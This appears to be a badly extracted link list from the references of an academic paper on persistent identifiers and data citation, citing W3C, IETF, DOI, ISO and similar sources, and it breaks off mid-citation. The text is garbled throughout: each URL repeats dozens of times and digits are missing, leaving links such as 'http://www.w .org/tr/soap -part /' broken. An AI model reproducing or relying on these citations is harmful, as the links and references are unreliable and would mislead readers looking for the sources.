https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm http://dx.doi.org/ . / . http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / http://www.w .org/tr/xmlschema - / https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ http://dx.doi.org/ . /journal.pcbi. http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://www.w .org/ /sw/hcls/notes/hcls-dataset/ http://dx.doi.org/ . /bmj.b http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/soap -part / http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice http://www.w .org/tr/ /note-ws-gloss- /#webservice https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf http://xml.coverpages.org/ecpa-persistentidentifiers.pdf https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://vso .nascom.nasa.gov/rdap/rdap _landingpages_handout.pdf http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://dx.doi.org/ . /journal.pmed. http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber= http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://dx.doi.org/ . /peerj-cs. janée g, kunze j, starr j. . identifiers made easy. available at http://ezid.cdlib.org/. juty n, le novére n, laibe c. . identifiers.org and miriam registry: community resources to provide persistent 